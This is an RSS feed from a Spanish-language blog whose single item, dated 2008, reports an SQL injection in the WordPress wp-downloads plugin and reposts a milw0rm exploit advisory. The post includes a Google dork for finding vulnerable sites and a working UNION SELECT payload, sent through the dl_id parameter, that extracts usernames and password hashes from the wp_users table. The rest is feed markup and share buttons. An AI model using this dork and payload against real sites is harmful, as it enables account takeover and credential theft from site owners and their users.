<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Exactlimon y la web 2.0 &#187; vulnerabilidades</title>
	<atom:link href="http://exactlimon.com/tag/vulnerabilidades/feed" rel="self" type="application/rss+xml" />
	<link>http://exactlimon.com</link>
	<description>las paginas web mas interesantes, mundo geek, seguridad informatica, web 2.0</description>
	<lastBuildDate>Thu, 12 Jan 2012 20:14:19 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
<image>
  <link>http://exactlimon.com</link>
  <url>http://exactlimon.com/favicon2.ico</url>
  <title>Exactlimon y la web 2.0</title>
</image>
		<item>
		<title>vulnerabilidad en un plugin de wordpress</title>
		<link>http://exactlimon.com/62/noticias/vulnerabilidad-en-un-plugin-de-wordpress.html</link>
		<comments>http://exactlimon.com/62/noticias/vulnerabilidad-en-un-plugin-de-wordpress.html#comments</comments>
		<pubDate>Tue, 01 Apr 2008 05:12:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[noticias]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[vulnerabilidades]]></category>

		<guid isPermaLink="false">http://www.exactlimon.com/?p=60</guid>
		<description><![CDATA[hoy mediante el blog de mi amigo neri me informe sobre una vulnerabilidad que afecta un plugin de wordpress el cual se llama wp-downloads el plugin es vbulnerable a una inyeccion SQL. el exploit fue subido a milw0rm aca les dejo el codigo url: http://milw0rm.com/exploits/5326 ############################################################### # # WordPress Plugin Download file Remote SQL Injection [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img src="http://factorycity.net/projects/wordpress-icon/images/icon-big.png" alt="" width="202" height="181" /></p>
<p>hoy mediante el blog de mi amigo <a href="http://tengoun.com.ar/wp-download-plugin-vulnerabilidad/vulnerabilidades/03/2008/">neri</a></p>
<p>me informe sobre una vulnerabilidad que afecta un plugin de wordpress el cual se llama wp-downloads<br />
el plugin es vbulnerable a una inyeccion SQL.</p>
<p>el exploit fue subido a milw0rm aca les dejo el codigo</p>
<p><span id="more-62"></span></p>
<pre>url: http://milw0rm.com/exploits/5326
###############################################################
#
# WordPress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
# Mail: bl4ck00@gmail.com
#
################################################################
#
# Dork: inurl:"wp-download.php?dl_id="
#
################################################################
Example:

http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]

SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
################################################################
# Greetz: ZioN, b!g B0$$, h4cky0u.org
################################################################

# milw0rm.com [2008-03-31]</pre>
</script>
<span style=''><g:plusone count="true" size="tall"></g:plusone>
<a href="http://vivociti.com/component/option,com_remository/Itemid,40/func,select/id,16/" title="Get Google +1 (Google Plus One) Recommend Button For WordPress Plugin" target="_blank"><img src="http://vivociti.com/images/plus2x2.gif" border="0"/></a></span>
	<div style="">
		<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-text="vulnerabilidad en un plugin de wordpress" data-url="http://exactlimon.com/62/noticias/vulnerabilidad-en-un-plugin-de-wordpress.html"  data-via="exactlimon" data-lang="es">Tweet</a>
	</div>
	<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>]]></content:encoded>
			<wfw:commentRss>http://exactlimon.com/62/noticias/vulnerabilidad-en-un-plugin-de-wordpress.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

